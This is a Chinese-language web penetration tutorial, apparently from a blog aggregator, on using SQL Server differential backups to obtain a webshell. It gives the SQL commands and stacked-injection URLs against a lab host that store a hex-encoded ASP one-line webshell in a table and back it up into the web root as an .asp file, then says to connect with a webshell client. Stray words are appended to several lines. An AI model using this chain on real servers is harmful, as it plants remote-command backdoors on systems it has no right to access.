Web滲透之mssql差別備份getshell

簡介

差別備份數據庫獲得webshell。在sql server 裏dbo和sa權限都有備份數據庫權限,咱們能夠把數據庫備份稱asp文件,這樣咱們就能夠經過mssqlserver的備份數據庫功能生成一個網頁小馬。web


 

 

差別備份的流程大概這樣:

1.完整備份一次(保存位置固然能夠改)sql

backup database 庫名 to disk = 
'c:\ddd.bak';--

2.建立表並插入數據shell

create table [dbo].[dtest] ([cmd] 
[image]);-- insert into dtest(cmd) values(0x3C25657865637574652872657175657374282261222929253E);--

3.進行差別備份數據庫

backup 
database 庫名 to disk='目標位置\d.asp' WITH DIFFERENTIAL,FORMAT;--

上面sqlserver

0x3C25657865637574652872657175657374282261222929253E
就是一句話木馬的內容:<%execute(request("a"))%>

例子

測試例子中我目標網站的絕對路徑是E:\wwwroot\asp_sqli,數據庫名是asp_test測試

一、網站

http://192.168.5.21:81/index.asp?id=1;backup%20database%20asp_test%20to%20disk%20=%27E:\wwwroot\asp_sqli\ddd.bak%27;--

二、spa

http://192.168.5.21:81/index.asp?id=1;create%20table%20[dbo].[dtest]%20([cmd][image]);--
http://192.168.5.21:81/index.asp?id=1;insert%20into%20dtest(cmd)values(0x3C25657865637574652872657175657374282261222929253E);--

 

 

 

三、3d

http://192.168.5.21:81/index.asp?id=1;backup%20database%20asp_test%20to%20disk=%27E:\wwwroot\asp_sqli\d.asp%27%20WITH%20DIFFERENTIAL,FORMAT;--

 

菜刀鏈接d.asp便可。code

 

相關文章
相關標籤/搜索